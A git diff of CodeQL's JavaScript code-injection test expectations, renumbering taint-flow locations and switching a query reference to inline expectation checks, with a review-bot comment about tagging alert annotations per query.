-| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... 
+ "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | 
@@ -102,25 +167,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| tst.js:35:28:35:33 | source | semmle.label | source | -| tst.js:37:33:37:38 | source | semmle.label | source | +| tst.js:1:6:1:27 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:1:6:1:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:3:12:3:33 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:11:10:11:33 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:11:10:11:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:13:21:13:42 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:15:30:15:51 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:6:17:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | +| tst.js:17:11:17:32 | documen ... on.hash | semmle.label | documen ... on.hash | +| tst.js:17:11:17:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| tst.js:19:26:19:40 | location.search | semmle.label | location.search | +| tst.js:19:26:19:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | +| tst.js:22:9:22:82 | source | semmle.label | source | +| tst.js:22:18:22:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:22:18:22:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | +| tst.js:24:18:24:23 | source | semmle.label | source | +| tst.js:26:14:26:19 | source | semmle.label | source | +| tst.js:28:28:28:33 | source | semmle.label | source | +| tst.js:30:33:30:38 | source | semmle.label | source | | webix/webix.html:3:16:3:37 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:4:26:4:47 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.html:5:47:5:68 | documen ... on.hash | semmle.label | documen ... on.hash | 
@@ -128,68 +193,3 @@ nodes | webix/webix.js:4:22:4:43 | documen ... on.hash | semmle.label | documen ... on.hash | | webix/webix.js:5:43:5:64 | documen ... on.hash | semmle.label | documen ... on.hash | subpaths -#select -| NoSQLCodeInjection.js:18:24:18:37 | req.body.query | NoSQLCodeInjection.js:18:24:18:31 | req.body | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | This code execution depends on a $@. | NoSQLCodeInjection.js:18:24:18:31 | req.body | user-provided value | -| NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:19:36:19:43 | req.body | user-provided value | -| NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | This code execution depends on a $@. | NoSQLCodeInjection.js:22:36:22:43 | req.body | user-provided value | -| actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | actions.js:4:10:4:50 | github. ... message | This code execution depends on a $@. | actions.js:4:10:4:50 | github. ... message | user-provided value | -| angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | angularjs.js:10:22:10:36 | location.search | This code execution depends on a $@. | angularjs.js:10:22:10:36 | location.search | user-provided value | -| angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | angularjs.js:13:23:13:37 | location.search | This code execution depends on a $@. | angularjs.js:13:23:13:37 | location.search | user-provided value | -| angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | angularjs.js:16:28:16:42 | location.search | This code execution depends on a $@. 
| angularjs.js:16:28:16:42 | location.search | user-provided value | -| angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | angularjs.js:19:22:19:36 | location.search | This code execution depends on a $@. | angularjs.js:19:22:19:36 | location.search | user-provided value | -| angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | angularjs.js:22:27:22:41 | location.search | This code execution depends on a $@. | angularjs.js:22:27:22:41 | location.search | user-provided value | -| angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | angularjs.js:25:23:25:37 | location.search | This code execution depends on a $@. | angularjs.js:25:23:25:37 | location.search | user-provided value | -| angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | angularjs.js:28:33:28:47 | location.search | This code execution depends on a $@. | angularjs.js:28:33:28:47 | location.search | user-provided value | -| angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | angularjs.js:31:28:31:42 | location.search | This code execution depends on a $@. | angularjs.js:31:28:31:42 | location.search | user-provided value | -| angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | angularjs.js:34:18:34:32 | location.search | This code execution depends on a $@. | angularjs.js:34:18:34:32 | location.search | user-provided value | -| angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | angularjs.js:40:18:40:32 | location.search | This code execution depends on a $@. | angularjs.js:40:18:40:32 | location.search | user-provided value | -| angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | angularjs.js:44:17:44:31 | location.search | This code execution depends on a $@. 
| angularjs.js:44:17:44:31 | location.search | user-provided value | -| angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | angularjs.js:47:16:47:30 | location.search | This code execution depends on a $@. | angularjs.js:47:16:47:30 | location.search | user-provided value | -| angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | angularjs.js:50:22:50:36 | location.search | This code execution depends on a $@. | angularjs.js:50:22:50:36 | location.search | user-provided value | -| angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | angularjs.js:53:32:53:46 | location.search | This code execution depends on a $@. | angularjs.js:53:32:53:46 | location.search | user-provided value | -| express.js:7:24:7:69 | "return ... + "];" | express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | This code execution depends on a $@. | express.js:7:44:7:62 | req.param("wobble") | user-provided value | -| express.js:9:34:9:79 | "return ... + "];" | express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | This code execution depends on a $@. | express.js:9:54:9:72 | req.param("wobble") | user-provided value | -| express.js:12:8:12:53 | "return ... + "];" | express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | This code execution depends on a $@. | express.js:12:28:12:46 | req.param("wobble") | user-provided value | -| express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | express.js:15:22:15:54 | req.par ... ction") | This code execution depends on a $@. | express.js:15:22:15:54 | req.par ... ction") | user-provided value | -| express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | express.js:17:30:17:53 | req.par ... cript") | This code execution depends on a $@. 
| express.js:17:30:17:53 | req.par ... cript") | user-provided value | -| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value | -| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value | -| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value | -| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value | -| express.js:50:10:50:12 | msg | express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | This code execution depends on a $@. | express.js:49:30:49:32 | msg | user-provided value | -| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value | -| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value | -| react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. 
| react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-native.js:10:23:10:29 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:10:23:10:29 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... on.hash | react.js:10:56:10:77 | documen ... on.hash | This code execution depends on a $@. | react.js:10:56:10:77 | documen ... on.hash | user-provided value | -| template-sinks.js:20:17:20:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:20:17:20:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:21:16:21:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:21:16:21:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:22:18:22:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:22:18:22:24 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:23:17:23:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:23:17:23:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:24:18:24:24 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:24:18:24:24 | tainted | Template, which may contain code, depends on a $@. 
| template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:25:16:25:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:25:16:25:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:26:27:26:33 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:26:27:26:33 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:27:21:27:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:27:21:27:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:28:17:28:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:28:17:28:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:29:24:29:30 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:29:24:29:30 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:30:21:30:27 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:30:21:30:27 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:31:19:31:25 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:31:19:31:25 | tainted | Template, which may contain code, depends on a $@. 
| template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:32:16:32:22 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:32:16:32:22 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| template-sinks.js:33:17:33:23 | tainted | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:33:17:33:23 | tainted | Template, which may contain code, depends on a $@. | template-sinks.js:18:19:18:31 | req.query.foo | user-provided value | -| tst.js:2:6:2:83 | documen ... t=")+8) | tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | This code execution depends on a $@. | tst.js:2:6:2:27 | documen ... on.href | user-provided value | -| tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | tst.js:5:12:5:33 | documen ... on.hash | This code execution depends on a $@. | tst.js:5:12:5:33 | documen ... on.hash | user-provided value | -| tst.js:14:10:14:74 | documen ... , "$1") | tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | This code execution depends on a $@. | tst.js:14:10:14:33 | documen ... .search | user-provided value | -| tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | tst.js:17:21:17:42 | documen ... on.hash | This code execution depends on a $@. | tst.js:17:21:17:42 | documen ... on.hash | user-provided value | -| tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | tst.js:20:30:20:51 | documen ... on.hash | This code execution depends on a $@. | tst.js:20:30:20:51 | documen ... on.hash | user-provided value | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:6:23:46 | atob(do ... ing(1)) | This code execution depends on a $@. | tst.js:23:11:23:32 | documen ... 
on.hash | user-provided value | -| tst.js:26:26:26:53 | locatio ... ring(1) | tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | This code execution depends on a $@. | tst.js:26:26:26:40 | location.search | user-provided value | -| tst.js:31:18:31:23 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:31:18:31:23 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:33:14:33:19 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:33:14:33:19 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:35:28:35:33 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:35:28:35:33 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| tst.js:37:33:37:38 | source | tst.js:29:18:29:41 | documen ... .search | tst.js:37:33:37:38 | source | This code execution depends on a $@. | tst.js:29:18:29:41 | documen ... .search | user-provided value | -| webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | webix/webix.html:3:16:3:37 | documen ... on.hash | This code execution depends on a $@. | webix/webix.html:3:16:3:37 | documen ... on.hash | user-provided value | -| webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | webix/webix.html:4:26:4:47 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:4:26:4:47 | documen ... on.hash | user-provided value | -| webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | webix/webix.html:5:47:5:68 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.html:5:47:5:68 | documen ... on.hash | user-provided value | -| webix/webix.js:3:12:3:33 | documen ... 
on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | webix/webix.js:3:12:3:33 | documen ... on.hash | This code execution depends on a $@. | webix/webix.js:3:12:3:33 | documen ... on.hash | user-provided value | -| webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | webix/webix.js:4:22:4:43 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:4:22:4:43 | documen ... on.hash | user-provided value | -| webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | webix/webix.js:5:43:5:64 | documen ... on.hash | Template, which may contain code, depends on a $@. | webix/webix.js:5:43:5:64 | documen ... on.hash | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref index fe9adbf3b64d..bfeec8aec393 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjection.ql +query: Security/CWE-094/CodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected index 2be7dc659f29..ba973943e124 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected 
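Review bot: Adding `postprocess: utils/test/InlineExpectationsTestQuery.ql` to CodeInjection.qlref means the inline annotations in this directory's shared test sources are now checked against this query, and the same line is added to ImproperCodeSanitization.qlref further down. The two queries flag different files (the `bad-code-sanitization.js` rows appear only in ImproperCodeSanitization.expected), so an untagged `// $ Alert` comment would presumably be reported as a missing result by whichever query does not fire on that line. The annotated sources are outside this part of the diff, so this cannot be confirmed here. It is worth checking that each annotation carries its query id, in the form `// $ Alert[<query-id>]`. Otherwise a lost true positive in one query could be masked by the other query's alert on the same line.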
@@ -3,14 +3,14 @@ edges | NoSQLCodeInjection.js:19:36:19:43 | req.body | NoSQLCodeInjection.js:19:24:19:48 | "name = ... dy.name | provenance | | | NoSQLCodeInjection.js:22:36:22:43 | req.body | NoSQLCodeInjection.js:22:24:22:48 | "name = ... dy.name | provenance | | | eslint-escope-build.js:20:22:20:22 | c | eslint-escope-build.js:21:16:21:16 | c | provenance | | -| express.js:7:44:7:62 | req.param("wobble") | express.js:7:24:7:69 | "return ... + "];" | provenance | | -| express.js:9:54:9:72 | req.param("wobble") | express.js:9:34:9:79 | "return ... + "];" | provenance | | -| express.js:12:28:12:46 | req.param("wobble") | express.js:12:8:12:53 | "return ... + "];" | provenance | | -| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint | provenance | | -| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint | provenance | | -| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint | provenance | | -| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint | provenance | | -| express.js:49:30:49:32 | msg | express.js:50:10:50:12 | msg | provenance | | +| express.js:6:44:6:62 | req.param("wobble") | express.js:6:24:6:69 | "return ... + "];" | provenance | | +| express.js:7:54:7:72 | req.param("wobble") | express.js:7:34:7:79 | "return ... + "];" | provenance | | +| express.js:9:28:9:46 | req.param("wobble") | express.js:9:8:9:53 | "return ... 
+ "];" | provenance | | +| express.js:19:9:19:35 | taint | express.js:20:34:20:38 | taint | provenance | | +| express.js:19:17:19:35 | req.param("wobble") | express.js:19:9:19:35 | taint | provenance | | +| express.js:27:9:27:35 | taint | express.js:36:15:36:19 | taint | provenance | | +| express.js:27:17:27:35 | req.param("wobble") | express.js:27:9:27:35 | taint | provenance | | +| express.js:42:30:42:32 | msg | express.js:43:10:43:12 | msg | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:10:23:10:29 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | 
@@ -29,17 +29,17 @@ edges | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:32:16:32:22 | tainted | provenance | | | template-sinks.js:18:9:18:31 | tainted | template-sinks.js:33:17:33:23 | tainted | provenance | | | template-sinks.js:18:19:18:31 | req.query.foo | template-sinks.js:18:9:18:31 | tainted | provenance | | -| tst.js:2:6:2:27 | documen ... on.href | tst.js:2:6:2:83 | documen ... t=")+8) | provenance | | -| tst.js:14:10:14:33 | documen ... .search | tst.js:14:10:14:74 | documen ... , "$1") | provenance | | -| tst.js:23:11:23:32 | documen ... on.hash | tst.js:23:11:23:45 | documen ... ring(1) | provenance | | -| tst.js:23:11:23:45 | documen ... ring(1) | tst.js:23:6:23:46 | atob(do ... ing(1)) | provenance | | -| tst.js:26:26:26:40 | location.search | tst.js:26:26:26:53 | locatio ... ring(1) | provenance | | -| tst.js:29:9:29:82 | source | tst.js:31:18:31:23 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:33:14:33:19 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:35:28:35:33 | source | provenance | | -| tst.js:29:9:29:82 | source | tst.js:37:33:37:38 | source | provenance | | -| tst.js:29:18:29:41 | documen ... .search | tst.js:29:18:29:82 | documen ... , "$1") | provenance | | -| tst.js:29:18:29:82 | documen ... , "$1") | tst.js:29:9:29:82 | source | provenance | | +| tst.js:1:6:1:27 | documen ... on.href | tst.js:1:6:1:83 | documen ... t=")+8) | provenance | | +| tst.js:11:10:11:33 | documen ... .search | tst.js:11:10:11:74 | documen ... , "$1") | provenance | | +| tst.js:17:11:17:32 | documen ... on.hash | tst.js:17:11:17:45 | documen ... ring(1) | provenance | | +| tst.js:17:11:17:45 | documen ... ring(1) | tst.js:17:6:17:46 | atob(do ... ing(1)) | provenance | | +| tst.js:19:26:19:40 | location.search | tst.js:19:26:19:53 | locatio ... 
ring(1) | provenance | | +| tst.js:22:9:22:82 | source | tst.js:24:18:24:23 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:26:14:26:19 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:28:28:28:33 | source | provenance | | +| tst.js:22:9:22:82 | source | tst.js:30:33:30:38 | source | provenance | | +| tst.js:22:18:22:41 | documen ... .search | tst.js:22:18:22:82 | documen ... , "$1") | provenance | | +| tst.js:22:18:22:82 | documen ... , "$1") | tst.js:22:9:22:82 | source | provenance | | nodes | NoSQLCodeInjection.js:18:24:18:31 | req.body | semmle.label | req.body | | NoSQLCodeInjection.js:18:24:18:37 | req.body.query | semmle.label | req.body.query | 
@@ -64,24 +64,24 @@ nodes | angularjs.js:53:32:53:46 | location.search | semmle.label | location.search | | eslint-escope-build.js:20:22:20:22 | c | semmle.label | c | | eslint-escope-build.js:21:16:21:16 | c | semmle.label | c | -| express.js:7:24:7:69 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:7:44:7:62 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:9:34:9:79 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:9:54:9:72 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:12:8:12:53 | "return ... + "];" | semmle.label | "return ... + "];" | -| express.js:12:28:12:46 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:15:22:15:54 | req.par ... ction") | semmle.label | req.par ... ction") | -| express.js:17:30:17:53 | req.par ... cript") | semmle.label | req.par ... cript") | -| express.js:19:37:19:70 | req.par ... odule") | semmle.label | req.par ... odule") | -| express.js:21:19:21:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | -| express.js:26:9:26:35 | taint | semmle.label | taint | -| express.js:26:17:26:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:27:34:27:38 | taint | semmle.label | taint | -| express.js:34:9:34:35 | taint | semmle.label | taint | -| express.js:34:17:34:35 | req.param("wobble") | semmle.label | req.param("wobble") | -| express.js:43:15:43:19 | taint | semmle.label | taint | -| express.js:49:30:49:32 | msg | semmle.label | msg | -| express.js:50:10:50:12 | msg | semmle.label | msg | +| express.js:6:24:6:69 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:6:44:6:62 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:7:34:7:79 | "return ... + "];" | semmle.label | "return ... + "];" | +| express.js:7:54:7:72 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:9:8:9:53 | "return ... 
+ "];" | semmle.label | "return ... + "];" | +| express.js:9:28:9:46 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:11:22:11:54 | req.par ... ction") | semmle.label | req.par ... ction") | +| express.js:12:30:12:53 | req.par ... cript") | semmle.label | req.par ... cript") | +| express.js:13:37:13:70 | req.par ... odule") | semmle.label | req.par ... odule") | +| express.js:14:19:14:48 | req.par ... ntext") | semmle.label | req.par ... ntext") | +| express.js:19:9:19:35 | taint | semmle.label | taint | +| express.js:19:17:19:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:20:34:20:38 | taint | semmle.label | taint | +| express.js:27:9:27:35 | taint | semmle.label | taint | +| express.js:27:17:27:35 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:36:15:36:19 | taint | semmle.label | taint | +| express.js:42:30:42:32 | msg | semmle.label | msg | +| express.js:43:10:43:12 | msg | semmle.label | msg | | module.js:9:16:9:29 | req.query.code | semmle.label | req.query.code | | module.js:11:17:11:30 | req.query.code | semmle.label | req.query.code | | react-native.js:7:7:7:33 | tainted | semmle.label | tainted | 
@@ -105,25 +105,25 @@ nodes | template-sinks.js:31:19:31:25 | tainted | semmle.label | tainted | | template-sinks.js:32:16:32:22 | tainted | semmle.label | tainted | | template-sinks.js:33:17:33:23 | tainted | semmle.label | tainted | -| tst.js:2:6:2:27 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:2:6:2:83 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:5:12:5:33 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:14:10:14:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:14:10:14:74 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:17:21:17:42 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:20:30:20:51 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:6:23:46 | atob(do ... ing(1)) | semmle.label | atob(do ... ing(1)) | -| tst.js:23:11:23:32 | documen ... on.hash | semmle.label | documen ... on.hash | -| tst.js:23:11:23:45 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| tst.js:26:26:26:40 | location.search | semmle.label | location.search | -| tst.js:26:26:26:53 | locatio ... ring(1) | semmle.label | locatio ... ring(1) | -| tst.js:29:9:29:82 | source | semmle.label | source | -| tst.js:29:18:29:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:29:18:29:82 | documen ... , "$1") | semmle.label | documen ... , "$1") | -| tst.js:31:18:31:23 | source | semmle.label | source | -| tst.js:33:14:33:19 | source | semmle.label | source | -| 